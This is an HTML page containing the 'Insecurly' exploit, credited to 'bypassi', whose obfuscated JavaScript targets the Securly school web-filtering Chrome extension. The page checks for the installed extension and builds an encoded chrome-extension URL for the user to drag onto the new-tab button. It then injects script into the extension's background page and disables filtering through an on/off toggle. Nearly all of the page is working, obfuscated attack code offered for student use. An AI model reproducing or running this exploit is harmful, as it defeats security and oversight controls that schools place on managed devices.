<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <title></title> <style> #error { display: none; } #draggable { display: none; background-color: black; color: white; padding: 0px; cursor: pointer; } .shown { display: inline-block !important; } </style> <script defer>

// Script

const m = function() {
    document.body.innerHTML = '    <style>\n' +
  '    body {\n' +
  '      background-color:black;\n' +
  '      color:#eeeeee;\n' +
  '      font-family:Arial;\n' +
  '    }\n' +
  '    h1 {\n' +
  '      font-size: 40px;\n' +
  '      font-weight:normal;\n' +
  '    }\n' +
  '    .switch-area {\n' +
  '      display:flex;\n' +
  '      margin:10px 0px;\n' +
  '    }\n' +
  '    .switch-area div{\n' +
  '      font-size:20px;\n' +
  '      padding:6px 0px;\n' +
  '      height:32px;\n' +
  '    }\n' +
  '    #desc {\n' +
  '      font-size:18px;\n' +
  '      max-width:320px;\n' +
  '    }\n' +
  '    #updates {\n' +
  '      font-size:15px;\n' +
  '      margin-top:15px;\n' +
  '      color:#999999;\n' +
  '    }\n' +
  '    /* https://danklammer.com/articles/simple-css-toggle-switch/ */\n' +
  '    #toggle {\n' +
  '        appearance: none;\n' +
  '        width: 62px;\n' +
  '        height: 32px;\n' +
  '        display: inline-block;\n' +
  '        position: relative;\n' +
  '        border-radius: 50px;\n' +
  '        overflow: hidden;\n' +
  '        outline: none;\n' +
  '        border: none;\n' +
  '        cursor: pointer;\n' +
  '        background-color: #707070;\n' +
  '        transition: background-color ease 0.3s;\n' +
  '      }\n' +
  '      #toggle:before {\n' +
  '        content: "on off";\n' +
  '        display: block;\n' +
  '        position: absolute;\n' +
  '        z-index: 2;\n' +
  '        width: 28px;\n' +
  '        height: 28px;\n' +
  '        background: #fff;\n' +
  '        left: 2px;\n' +
  '        top: 2px;\n' +
  '        border-radius: 50%;\n' +
  '        font: 10px/28px Helvetica;\n' +
  '        text-transform: uppercase;\n' +
  '        font-weight: bold;\n' +
  '        text-indent: -22px;\n' +
  '        word-spacing: 37px;\n' +
  '        color: #fff;\n' +
  '        text-shadow: -1px -1px rgba(0,0,0,0.15);\n' +
  '        white-space: nowrap;\n' +
  '        box-shadow: 0 1px 2px rgba(0,0,0,0.2);\n' +
  '        transition: all cubic-bezier(0.3, 1.5, 0.7, 1) 0.3s;\n' +
  '      }\n' +
  '      #toggle:checked {\n' +
  '        background-color: #4CD964;\n' +
  '      }\n' +
  '      #toggle:checked:before {\n' +
  '        left: 32px;\n' +
  '      }\n' +
  '    </style>\n' +
  '    <h1>INSECURLY exploit (by bypassi)</h1>\n' +
  '    <div class="switch-area">\n' +
  '      <div>securly is currently</div>\n' +
  '      <input id="toggle" type="checkbox" />\n' +
  '    </div>\n' +
  '    <div id="desc">\n' +
  '      the switch above allows you to turn the securly extension on and off. note that this will not bypass\n' +
  '      network filters or other filtering extensions. teachers using securly classroom will still be able to\n' +
  '      see your screen. more functionality is coming soon.\n' +
  '    </div>\n' +
  '    <div id="updates"></div>\n';


    let securlyWindow = window['chrome']['extension']['getBackgroundPage']();
    let securlyWindowChrome = () => securlyWindow.chrome;  // _ is a function with no paramaters that returns securlyWindow.chrome
    let D = document.getElementById("toggle");
    

    async function x() {
        D = new securlyWindow['Blob'](['window.clusterStatus.HELLO = 0'], {
          type: 'text/javascript'
        }),
        x = document.createElement("script");
      x.src = URL.createObjectURL(D), securlyWindow.document.body.appendChild(x) // ?? Injecting the code?
    }
    try {
      for (let $ = 0; $ < 10; $++) Reflect.construct(Blob, []);
      x()
    } catch (C) {}
    async function t(n, _, D) {
      let x = await new Promise(n => {
        window[d`G52;9D"5AE5CD\x169<5#ICD5=`](0, D.length, n)
      });
      return await new Promise(_ => {
        x.root.getFile(n, {}, n => {
          n.remove(_)
        }, _)
      }), new Promise($ => {
        x.root.getFile(n, {
          create: !0
        }, n => {
          n[d`3B51D5'B9D5B`](x => {
            x[d`?>GB9D5е>4`] = () => {
              delete[x, n]
            }, x[d`?>GB9D55>4`] = () => {
              $(n[d`D?%"\x1C`]())
            }, x.write(new window[d`\x12<?2`]([D], {
              type: _
            }))
          })
        })
      })
    }

    function B() {
      if (!window[d`<?31D9?>`][d`81C8`]) throw new window[d`\x15BB?B`]("IDK");
      let n = location.hash.replace("#", "");
      t(Math.random() + ".js", d`D5HD}:1F1C3B9@D`, n).then(n => {
        let _ = document.createElement("script");
        _.src = n, document.body.appendChild(_)
      })
    }
    securlyWindowChrome().runtime.id.startsWith("j") && (document.getElementById("updates").textContent = d`@1I<?14n\x03n1@@<954|nvI?En1B5>uDnCE@@?C54nD?n;>?GnG81DnD89Cn=51>Cw`, securlyWindowChrome().extension[d`C5D%@41D5%B<\x141D1`](decodeURIComponent(d`s\x15\x00s\x12\x06s\t\x15`).repeat(1024))), localStorage[d`3<ECD5B`]?.startsWith(d`\x11&\x1F\x19\x14/\x1F#z`) || (D.checked = !0), D.onclick = function $() {
      D[d`3853;54`] ? (delete window.WebRequestEventImpl, localStorage.clear()) : (securlyWindowChrome().management[d`E>9>CD1<<#5<6`].bind(securlyWindowChrome().runtime.id), Storage.prototype[d`C5D\x19D5=`].call(window[d`<?31<#D?B175`], d`3<ECD5B`, d`\x11&\x1F\x19\x14/\x1F#z` + Date.now() * (Math[d`B1>4?=`]() + 1.5))), location.reload.call(securlyWindow[d`<?31D9?>`]), setTimeout(x, 1500)
    }, t(d`}9|:C`, d`D5HD}:1F1C3B9@D`, o + d + t + B + ";" + B.name + "()//"), t(d`}9|8D=<`, "text/html", d`\fC3B9@DnCB3\rp|}9|:Cp\x0E\f}C3B9@D\x0E`)
  },
  а = ["=1>965CD|:C?>", "2<?3;54|8D=<", "2<?3;54|:C", "3?>6|:C\x01", "3?>D5>D	|=9>|:C", "C53EB<I|=9>|:C", "/=5D141D1}F5B96954/3?>D5>DC|:C?>", "6?>DC}\x1d5DB?@?<9C{\x1d549E=|G?66", '6?>DC}\x1d5DB?@?<9C{"57E<1B|G?66', "6?>DC}\x1d5DB?@?<9C{#5=9\x12?<4|G?66", "6?>DC}\x1d5DB?@?<9C|3CC", ],
  SI = {
    NONE: "",
    OLD: d`985?217:;6;<><9;7981><8344:?98;7`,
    NEW: d`:?6<=;3392;??@<15?9>53:2=4527<12`
  };
async function g(n) {
  let a;
  try {
    a = await window[d`65D38`](d`38B?=5{5HD5>C9?>\n}}` + n + d`}` + d(а.at(d`\x01\x00`)))
  } catch (D) {
    return 0
  }
  return 200 === a[d`CD1DEC`] ? 1 : 0
}
async function gSI() {
  return await g(SI.NEW) ? SI.NEW : await g(SI.OLD) ? SI.OLD : SI.NONE
}

function e(n, _) {
  let D = function(n) {
      let _ = open();
      _.chrome = top.chrome[d`5HD5>C9?>`][d`75D\x1213;7B?E>4 175`]().chrome;
      let D = document[d`3B51D5\x15<5=5>D`]("script");
      D.src = n, _.document.body.appendChild(D), top.close()
    },
    x = URL[d`3B51D5\x1F2:53D%"\x1C`](n),
    $ = new window[d`\x12<?2`]([`${o};${d};(${D})("${x}")`], {
      type: d`D5HD}:1F1C3B9@D`
    }),
    C = URL[d`3B51D5\x1F2:53D%"\x1C`]($),
    t = d`\fCDI<5\x0ExKF9C929<9DI\n89445>M\f}CDI<5\x0EXnnnn\f96B1=5nCB34?3\rp\fC3B9@DnCB3\ru` + C + d`u\x0E\f}C3B9@D\x0Ep\x0EXnnnnnnnn\x189|n\x196nI?En31>nB514nD89CznD85n5H@<?9Dn494>uDnG?B;|Xnnnnnnnn'19Dn1n3?E@<5n?6nG55;C|n'5u<<n25n213;|||Xnnnn\f}96B1=5\x0E`;
  return d`38B?=5{5HD5>C9?>\n}}` + _ + d`}` + d(а[1]) + [d`\x0F31D57?BI\r`] + window[d`5>3?45%"\x19\x13?=@?>5>D`](window[d`2D?1`](t))
}

function gS2U(n) {
  return e(new window[d`\x12<?2`]([`${o};${d};(${m})()`], {
    type: d`D5HD}:1F1C3B9@D`
  }), n)
} [].__proto__[window[o`\x05+\x1F\x14!\x1E`][d`9D5B1D?B`]] = function*() {
  yield gS2U.call(this[0], this[1])
}, gSI().then(n => {
  if (n === SI.NONE) {
    let _ = document.getElementById("error");
    _.classList.add("shown"), _.textContent = d`)?En4?>uDn81F5n1>n145AE1D5nF5BC9?>n?6n#53EB<In9>CD1<<54|`
  } else {
    let D = [d`}2<?3;54|:C`, n],
      x = document.getElementById("draggable");
    x.classList.add("shown"), x[d`?>4B17CD1BD`] = n => {
      n[d`41D1$B1>C65B`].setData("text/plain", [...D])
    }
  }
});

function o(n, _ = 78, D = 126) {
  for (var x = n.toString().split(""), $ = 0; $ < x.length; $++) x[$].charCodeAt(0) <= D && (x[$] = String.fromCharCode((x[$].charCodeAt(0) + _) % D));
  return x.join("")
}

function d(n, _ = 78, D = 126) {
  return o(n, D - _)
}

</script> </head> <body> <p>Insecurly exploit</h1> <br><p>Made by bypassi, reuploaded on github by me.</p>p<div id="error"></div> <div id="draggable" draggable="true">drag this button onto the new tab button</div> <noscript>Por que no js?</noscript> </body> </html>
